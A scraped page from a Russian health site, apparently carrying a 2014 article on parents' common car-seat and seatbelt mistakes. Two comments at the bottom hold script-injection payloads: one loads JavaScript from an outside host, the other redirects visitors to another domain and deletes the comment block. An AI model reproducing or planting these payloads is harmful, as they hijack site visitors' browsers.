Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  9000 детей в год умирают ...  >>  9000 детей в год умирают в ДТП из-за ошибок родителей. Но все можно предотвратить
 
Обратная связь
 

9000 детей в год умирают в ДТП из-за ошибок родителей. Но все можно предотвратить

Размер шрифта
11 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Считаете себя заботливыми родителями? Давайте проверим! Как ваш ребенок ездит в машине? О наиболее частых ошибках родителей за рулем читайте в нашей статье.

9000 детей в год умирают в ДТП из-за ошибок родителей. Но все можно предотвратить

Хорошие новости: эксперты утверждают, что со 2002 по 2011 годы в США количество смертей среди детей 12 лет и меньше в дорожных авариях снизилось на 43%. Тем не менее, за этот временной период из-за автокатастроф из жизни ушло более 9 000 детей. Согласитесь, эта цифра удручает.

Обычные правила безопасности на дороге включают соблюдение ПДД, трезвость за рулем, отказ от использования телефона во время движения и так далее. Однако для безопасности ребенка необходимо детское автокресло, которое должно соответствовать возрасту и размеру малыша. Все эти правила звучат очень просто, однако для части родителей они не очевидны, и они продолжают совершать ошибки, угрожающие жизни ребенка. Относитесь ли вы к таким родителям?

Самые распространенные ошибки родителей за рулем

1)Отказ от ремня безопасности

Каждый третий ребенок из детей младше 12 лет, которые погибли в 2011 году из-за аварий, не был пристегнут. Доля таких случаев возрастает среди детей 8-12 лет – уже 45% не были пристегнуты. Почему-то родители нередко халатно относятся к данному вопросу. Пристегивайте своих детей! Вы в ответе за жизнь ребенка.

2)Неправильная установка детского кресла

Самые частые ошибки при установке кресла:

  • Кресло двигается слишком свободно. На самом деле кресло не должно сдвигаться более чем на пару сантиметров
  • Использование одновременно кресла и обычного ремня
  • Вы забываете застегнуть верхний ремень
  • Несоблюдение инструкции

3)Ремни свободно болтаются

Все мы время от времени наступаем на эти грабли. Ребенок одет в новое толстое пальто – сегодня можно немного распустить ремни. Завтра малыш снова в тонкой курточке, но подтянуть ремни мы, как всегда, забываем или не успеваем. Да и ребенку удобнее сидеть, если ремень свободно болтается.

Это никуда не годится. Если ремень не затянут, кресло не выполняет своей функции.

4)Лишнее одеяльце, игрушки и другие прибамбасы для кресла

Подкладки и одеяла для кресла – не всегда хорошая идея, так же, как и игрушки. Последние помогут отвлечь и занять ребенка во время езды, однако в случае аварии они становятся повреждающими снарядами.

5)Лицом назад

Не сажайте ребенка в кресло, в котором он будет в обращен лицом вперед, до тех пор, пока ему не исполнится двух лет.

6)Кресло не по размеру

Почему-то некоторые родители не замечают, что кресло уже слишком мало для ребенка и упорно продолжают запихивать в него свое чадо. Поэтому подумайте еще раз, подходит ли кресло по размеру вашему ребенку, и при необходимости приобретите новое.

Другие родители совершают следующую ошибку – слишком торопятся посадить ребенка в большое кресло. Разумеется, малышу будет приятно сидеть в практически «взрослом» кресле, но не торопите события. К такому креслу ребенок будет готов лишь в 5-7 лет.

7)Я уже взрослый!

Когда дети начинают ходить в сад или школу, они часто стесняются того, что ездят в детском кресле. Нередко родители поддаются на их уговоры и позволяют иногда, а то и вовсе всегда ездить в автомобиле без кресла. Помните, что пока ребенок не достиг хотя бы 145-сантиметрового роста, ремень безопасности работает недостаточно эффективно.

8)Переднее сиденье

Все мы помним, как приятно было в детстве усесться рядом с папой на переднее сиденье. Но безопаснее всего, если до 13 лет ребенок будет оставаться на заднем сиденье. Тем более нельзя устанавливать на переднее сиденье детское кресло, в котором ребенок обращен лицом назад.

Хотите больше узнать о том, как заботиться о ребенке? Читайте наш спецпроект «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:33

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Вакцина, которую должен сделать каждый!   Учителя, которые запугивают детей, снижают баллы на ЕГЭ! Остановите их, пока не поздно!  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Первые шаги вашего малыша
Есть ли секс во время беременности?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.